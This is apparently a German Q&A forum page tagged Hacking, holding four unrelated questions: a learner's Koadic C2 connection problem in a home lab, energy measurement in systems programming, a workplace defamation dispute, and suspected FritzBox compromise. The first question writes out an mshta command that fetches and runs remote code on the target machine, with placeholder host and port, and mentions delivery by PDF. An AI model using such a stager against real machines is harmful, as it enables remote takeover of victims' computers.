Koadic Framework kann nicht mit meinem Test PC verbinden?

Guten Tag! Ich habe mir erst vor kurzem etwas ins Hacking eingelesen und bin auf das Koadic Framework gestossen. Ich habe mir zig Tutorials angesehen aber bei mir verbindet meine VM (Windows) mit dem Command "mshta http://[ip]:[port]/[Code]" nie mit dem Angreifer PC (in meinem Fall Kali Linux). (Also dieser Command wird halt von dem Angegriffenen PC ausgeführt, später mit PDF usw.) Hatte jemand schon einmal das selbe Problem oder ein ähnliches und wüsste, wie man es beheben könnte? Vielen Dank schonmal im voraus.

Computer, Technik, Programmieren, Hacking, Technologie
Frage an die Systementwickler unter euch ...?

Diese Frage richtet sich an Low-Level-Entwickler und Leute, die eingebettete Systeme bzw. Mikrocontroller programmieren, oder ganz allgemein Kernelhacker:

Nutzt ihr während des Entwicklungsprozesses neben den herkömmlichen Werkzeugen wie Debugger, Profiler, Sanitizer, Fuzzer, usw. eigentlich auch Hardware-Messgeräte um den Stromverbrauch kritischer Codestellen zu messen?

Mir ist schon vor Jahren aufgefallen, dass wenn man laut Profiler zwei oder mehr gleichwertig wirkende Möglichkeiten der Optimierung hat, die Stromaufnahme meist extrem schwankt.

Ich mag ineffizienten Code überhaupt nicht, und wenn die CPU an einer kritische Stelle dauerhaft fünf mal so viel Strom frisst als nötig, optimiere ich das gerne weg.

In meinem Umfeld hat das keiner meiner früheren Kollegen so gemacht, und viele waren vorher auch sehr skeptisch, aber nach und nach haben sich viele ein Wattmeter vor den PC bzw. das entspr. Gerät gehängt, um zu sehen, wie der Stromverbrauch an kritischen Stellen im Vergleich zu ähnlichen Implementierungen ist.

Wir haben z. B. eine Bibliothek geschrieben, die auf einem Server "Dinge tut", und mit Implementierung A frisst ein entsprechender Teil über 100 Watt, mit Implementierung B hingegen nur so um die 20 Watt, bei gleicher Performance und gleichem Speicherverbrauch, laut Profiler.

Wie seht ihr das? Macht ihr das auch schon so? Oder ist das ein interessanter Denkanstoß?

(Ich weiß, dass das bei vielen Programmen kaum Sinn ergibt, und gerade Frameworks wie Electron so verschwenderisch mit Ressourcen umgehen, dass ich mich hier wirklich nur auf die Systemprogrammierung beziehe, bzw. an Leute richte, die relativ low-level Bibliotheken o. ä. entwickeln.)

Ich bedanke mich im Voraus und wünsche noch einen schönen Tag!

andere Antwort 100%
ist mir neu, klingt aber interessant 0%
ist mir neu, halte ich aber für Quatsch 0%
ist mir nicht neu, mache ich auch so 0%
ist mir nicht neu, mache ich aber nicht so 0%
Software, Linux, Hardware, Elektronik, Programmieren, Elektrotechnik, mikrocontroller, Programmierung, cplusplus, CPP, E-Technik, Hacker, Hacking, Unix
Soll ich Anzeige erstellen, oder macht mich das zum bösen Menschen?

Guten Abend zsm. ich habe mal eine Frage gestellt bezüglich Bedrohungen etc.

Jetzt zu meiner abschließenden Frage zu diesem Thema.

Ich habe herausgefunden, dass meine ehemaligen Kolleginnen, üble Nachrede betrieben haben, es wurde behauptet ich hätte eine von den beiden geschlagen etc. das alles und noch einige mehr Gerüchte, führten dann zu meiner Kündigung. Außerdem hab ich herausfinden können, wem die ausländische Nummer, welche mir gedroht hatte gehört. Ein Mitglied ihrer Familie. Meine Freunde und einige ehemalige Kollegen sagen, jetzt kann man eigentlich wirklich sagen, dass die Drohungen von der einen Kollegin A dass sie Kollegin B dabei helfen wollte, mich loszuwerden. Ich bin auch kein Mensch, der sich rächen will etc. Ich möchte einfach die Wahrheit erfahren. Warum die beiden vor den Chefs gelogen haben, obwohl wir einst sehr gute Freunde waren. Ich hab in meinen Augen alles gemacht, was man machen kann. Ich hab mich vorerst gegen eine Anzeige entschieden und ein Gespräch gesucht. Der einen Kollegin Emails gesendet die erste am 15.05 dazwischen alles gesagt, was mich bedrückt hatte und um ein Gespräch oder ein "Chat" gebeten. Heute hab ich erneut eine Email geschrieben. Anfang April hat sie mir in einer Email geschrieben, dass sie mich loswerden wollte, weil sie aufgrund eines Streits von 2020 so wütend war und nicht mehr mit mir arbeiten konnte etc.

Ich hab vier Wochen gewartet bis ich antworte. Weil ich nicht wusste, ob die Email wirklich von ihr war. Da bei mir einige Konten gehackt wurden. Was ich auch alles zur Anzeige gebracht habe, hatte ich das bedenken, dass auch bei ihr Email Spoofing betrieben wurde. Aber ich hab mich dann doch dazu entschieden zu antworten. Und hab ihr bis zum heutigen Tag meine Seele ausgeschrieben. Jetzt hab ich ihr alles gesagt was ich sagen wollte. Und hab immer wieder betont, dass ich ihr verhalten nicht richtig fand. Und dann eben noch persönliches geschrieben usw.

Jetzt meine Frage, war es richtig keine Anzeige zu erstatten oder würdet ihr sowas zu Anzeige bringen? Meine Freunde sagten mach es und sie sprachen von Respektlosigkeit etc.

Ich will ihr nichts böses oder ihrem Freund. Aber mir wurde auch geschrieben, dass ihr Freund mich loswerden wollte. Und er wohl dabei mitgemacht habe usw. Sie hat behauptet, dass sie bereits seit 2019 keinen Kontakt mehr wollte und so stand ich für einige so da, dass ich sie zu treffen etc. genötigt hätte. Warum schenkt man einem Menschen ein Geschenk zu Weihnachten, wenn man gar keine Interesse hat? Aus Mitleid? Das wäre ziemlich hart und respektlos usw.

Ist alles blöd. Ich hab durch die Dinge sehr viel verloren. Job einige Freunde und mein Selbstvertrauen.

Aber ich möchte ein neues Leben anfangen und weiß nicht, was ich machen soll.

Danke für eure antworten

Freundschaft, Cybermobbing, Drohung, Hacking, Liebe und Beziehung, Streit, Nachrede
Gehackt über die Fritzbox?

N´Abend zusammen.

Ist gerade irgend ein Schwachpunkt von Fritzboxen bekannt was Hacks angeht? Ich höre öfter Podcasts aus diesem Genre über Cyberkriminalität, und immer wieder höre ich von Fällen über eine neue Schwachstelle in Routern o.ä, über die dann jedes Gerät im Netzwerk infiziert wird. Was mich zu diesem Beitrag bewegt hat, war, dass in meinem lokalen Netzwerk auch einige Geräte etwa zeitgleich seltsame Probleme bekommen haben, was mich etwas verunsichert.

Ich habe recherchiert, und alle diese neuen Probleme können viele Gründe haben, aber eine Möglichkeit vereint alle, nämlich ein Virus.

Folgendes ist passiert.

Mein Internet, welches davor immer einwandfrei funktioniert hat (nach deutschen Maßstäben), ist plötzlich laggy geworden. Der Ping hat sich nicht verschlechtert, aber es gibt massiven Packetloss, den ich mir nicht erklären kann. Alle Treiber und Updates wurden aktualisiert und sind auf dem neuesten Stand, das Fritzbox-Modell ist glaube ich 2 Jahre alt und die Repeater sind die neuesten des Mesh-Bereichs, also keine alte Hard- oder Software.

Mein Pc wird zudem seit ungefähr demselben Zeitraum extrem heiß bei Sachen die ihn vorher nicht so sehr beansprucht hatten, und auch wenn kein Programm offen ist, laufen alle Kerne mit 100% maximaler Frequenz oder mehr. Er fängt an immer wieder allgemeine Lagspikes zu haben. Ich meine damit, dass es immer wieder vorkommt, dass er sogar 10 Sekunden braucht nur um ein Bild zu öffnen. Dieser Zustand dauert eta eine Minute an, und dann läuft alles wieder wie gewohnt. (Die Hardware ist nicht schlecht, daran liegts nicht. Außerdem hab ich ihn vor 3 Wochen neu aufgesetzt, also auch keine unnötigen Files die nicht mit-deinstalliert wurde, und an denen er nebenbei zu würgen hätte)

Und das letzte Gerät ist mein Handy. IPhone 8, neues os, wird auch seit etwa 3 Wochen bei normalen Sachen unnatürlich heiß und der Akku geht viel schneller leer. Was mich aber stutzig gemacht hat, war, dass ich auf einmal bemerkt habe, dass der Volume-Balken am Rand aufploppt, und meine Lautstärke um 2 Stufen nach unten gestellt wurde, ohne dass ich es angefasst oder irgendetwas anderes den Knopf betätigt hätte.

Bin ich paranoid, oder wäre ein Hacker in meinem Netzwerk als Möglichkeit doch nicht auszuschließen?

Internet, Technik, Hacker, Hacking

Meistgelesene Fragen zum Thema Hacking